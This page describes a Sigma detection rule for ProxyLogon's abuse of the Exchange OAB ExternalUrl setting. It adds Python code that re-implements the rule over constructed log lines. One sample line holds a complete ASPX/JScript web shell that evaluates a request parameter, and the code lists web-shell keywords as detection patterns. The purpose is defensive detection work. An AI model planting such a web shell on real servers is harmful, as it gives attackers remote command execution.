ProxyLogon MSExchange OabVirtualDirectory

Sigma Rules

Summary
This Sigma rule flags a post-exploitation artifact of ProxyLogon, the 2021 Microsoft Exchange exploit chain, on the server side. After gaining access, adversaries run the Set-OabVirtualDirectory PowerShell cmdlet against the Offline Address Book (OAB) virtual directory and pass script code instead of a URL in its ExternalUrl parameter; Exchange later writes that value into the virtual directory's configuration file on disk, which is how the chain drops a web shell. The rule therefore looks for the cmdlet and the ExternalUrl parameter together with payload fragments that never belong in a legitimate OAB URL (script tags, ASP.NET page-handler code and similar snippets). A match means the file-write stage of the exploit has most likely already succeeded, so the rule is rated critical. Requiring both halves, the cmdlet/parameter selection and at least one payload keyword, keeps false positives low: routine administration sets ExternalUrl to a plain https URL and does not fire the rule. The trade-off is that the rule is precise rather than broad; payloads that avoid the expected keywords are not covered and should be hunted for separately.
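To make the two-part logic concrete, the following is an added example, not the Sigma rule's own content or the SigmaHQ project's code. It re-implements the "cmdlet plus parameter AND payload keyword" structure in Python and runs it over constructed MSExchange Management style log lines. The exact indicator strings, the log line format of the samples, and the secondary check that flags an ExternalUrl value which is not a plain URL (which goes beyond the rule as described) are all assumptions made here; Set-OabVirtualDirectory and ExternalUrl are the real cmdlet and parameter names.

```python
"""Added example: a minimal re-implementation of the detection logic the
summary describes, run over constructed log lines. Indicator lists, sample
line format and the "medium" tier are this example's assumptions, not the
Sigma rule's definitions."""

import re
from dataclasses import dataclass

# Selection half: the cmdlet and parameter whose abuse the rule targets.
# Both spellings of the parameter are accepted so that a PowerShell-style
# "-ExternalUrl" and a "Parameter=Value" style log entry are both covered.
CMDLET_INDICATORS = ("set-oabvirtualdirectory",)
PARAMETER_INDICATORS = ("-externalurl", "externalurl=")

# Keyword half: fragments that have no business inside an OAB URL (assumed list).
PAYLOAD_INDICATORS = ("<script", "runat=", "page_load", "eval(", "request[")

# Captures the value handed to ExternalUrl in either form, stopping at a quote,
# a comma or a closing brace.
EXTERNAL_URL_RE = re.compile(r'externalurl[=\s]+"?(?P<value>[^",}]+)', re.IGNORECASE)

# A legitimate ExternalUrl is an http(s) URL with a host and a simple path.
PLAIN_URL_RE = re.compile(r"https?://[\w.-]+(?::\d+)?(?:/[\w./-]*)?")


@dataclass(frozen=True)
class Finding:
    line_no: int
    level: str          # "critical" for selection + payload keyword, "medium" for odd URL
    payload: tuple      # payload indicators seen on the line, in list order
    external_url: str   # value handed to ExternalUrl, "" if not extractable
    raw: str


def external_url_value(line):
    m = EXTERNAL_URL_RE.search(line)
    return m.group("value").strip() if m else ""


def is_plain_url(value):
    return bool(value) and PLAIN_URL_RE.fullmatch(value) is not None


def scan(lines):
    """Return one Finding per suspicious line; clean lines produce nothing."""
    findings = []
    for n, raw in enumerate(lines, 1):
        low = raw.lower()
        selected = (any(c in low for c in CMDLET_INDICATORS)
                    and any(p in low for p in PARAMETER_INDICATORS))
        if not selected:
            continue  # the rule only fires on the targeted cmdlet + parameter
        payload = tuple(k for k in PAYLOAD_INDICATORS if k in low)
        url = external_url_value(raw)
        if payload:
            findings.append(Finding(n, "critical", payload, url, raw))
        elif not is_plain_url(url):
            # Beyond the described rule: an ExternalUrl that is not a URL at all
            # but carries none of the known payload strings (assumed extra tier).
            findings.append(Finding(n, "medium", (), url, raw))
    return findings


# Constructed sample log lines (not real telemetry). Line 2 is modelled on the
# web-shell pattern publicly reported for ProxyLogon; line 4 is a made-up
# non-URL value with none of the known keywords.
SAMPLE_LOG = [
    'Cmdlet succeeded. Cmdlet Set-OabVirtualDirectory, parameters {Identity=EXCH01\\OAB (Default Web Site), ExternalUrl=https://mail.example.com/OAB}',
    'Cmdlet succeeded. Cmdlet Set-OabVirtualDirectory, parameters {Identity=EXCH01\\OAB (Default Web Site), ExternalUrl=http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["cmd"],"unsafe");}</script>}',
    'Cmdlet succeeded. Cmdlet Set-OwaVirtualDirectory, parameters {Identity=EXCH01\\owa (Default Web Site), ExternalUrl=https://mail.example.com/owa}',
    'Cmdlet succeeded. Cmdlet Set-OabVirtualDirectory, parameters {Identity=EXCH01\\OAB (Default Web Site), ExternalUrl=http://a/b/..\\..\\x.aspx}',
    'Cmdlet succeeded. Cmdlet Get-OabVirtualDirectory, parameters {Identity=EXCH01\\OAB (Default Web Site)}',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.level} payload={f.payload} url={f.external_url!r}")
```

Run stand-alone, only lines 2 and 4 are reported: the legitimate OAB URL on line 1 and the unrelated OWA cmdlet on line 3 are ignored because either the keyword half or the selection half fails, which is the precision the summary describes. The medium tier shows one way to widen coverage without giving up that precision, since it still requires the targeted cmdlet and parameter before it looks at the value.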
Categories
  • Windows
  • Cloud
  • On-Premise
Data Sources
  • Process
  • Application Log
  • Network Traffic
Created: 2021-08-09